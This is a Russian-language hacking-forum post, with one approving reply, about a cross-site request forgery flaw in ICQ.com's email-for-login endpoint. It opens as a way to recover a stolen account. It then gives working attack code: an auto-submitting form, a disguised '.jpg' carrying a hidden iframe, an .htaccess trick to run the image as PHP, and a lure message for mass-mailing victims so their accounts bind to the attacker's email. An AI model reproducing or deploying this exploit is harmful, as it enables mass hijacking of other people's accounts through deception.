Итак, новая система ретрива на ICQ.com вводилась 2 раза: одновременно с введением новой системы появилась возможность вписывать свое мыло в детали номера через страничку _http://www.icq.com/people/НОМЕР/edit/ (а не через _https://www.icq.com/register/email_attach.php) при этом тебе всего лишь нужно было быть залогиненным на асечном сайте; после первых тестов новую систему убрали и временно вернули старую. После повторного введения новой системы ретрива мыло для логина вновь менялось лишь на странице _https://www.icq.com/register/email_attach.php. После финального включения новой системы ретрива разработчики зачем-то решили оставить возможность прикрепления нового мыла с помощью первого варианта, но спрятали эту возможность глубоко в html-сорцах своих страниц Если у тебя угнали асю, твой алгоритм должен быть следующим (предварительно ты должен иметь живую сессию на ICQ.com): Сохрани на свой жесткий диск следующую html-страницу: PHP: <form action="http://icq.com/people/include/xhr.php" method="POST"><input name="f" value="resendMail"/><br/><input name="e" value="твое_мыло@мыло.ru"/><br/><input name="lang" value="en"/><br/><input name="server" value="prod"/><br/><input type="submit" value="ok"/><br/></form> Открывай данную страницу в браузере и жми на сабмит После сабмита на твое вписанное мыло упадет ссылка для подтверждения нового "email for login"; Переходи по данной ссылке и восстанавливай пароль на новое мыло с помощью _https://icq.com/password Автоматизация Создаем файл 1.php PHP: <body onload="document.getElementById('l').submit();"><form id='l' action="http://icq.com/people/include/xhr.php" method="POST"><input name="f" value="resendMail"/><br/><input name="e" value="твое_мыло@мыло.ru"/><br/><input name="lang" value="en"/><br/><input name="server" value="prod"/><br/<input type="submit" value="ok"/><br/></form> Создаем файл 2.jpg Код: <img src="http://c.icq.com/homepage/img/park_R_2010.jpg" <iframe width=1 height=0 style="position: absolute; visibility: hidden;" src="http://site.ru/1.php"></iframe> Создаем (дописываем) файл .htaccess Код: <files "2.jpg"> AddType application/x-httpd-php .jpg </files> Делаем рассылку в icq.com со словами "Прикольная картинка, как тебе? http://site.ru/2.jpg". На почту получаем кучу ретривов и никаких кукисов. Самый чистый csrf. (с) satana-fu M4g
Отличная статья на 5+ - только вот не все заходят на ICQ.COM и для массы её не используешь, но методом психологии всего можно добиться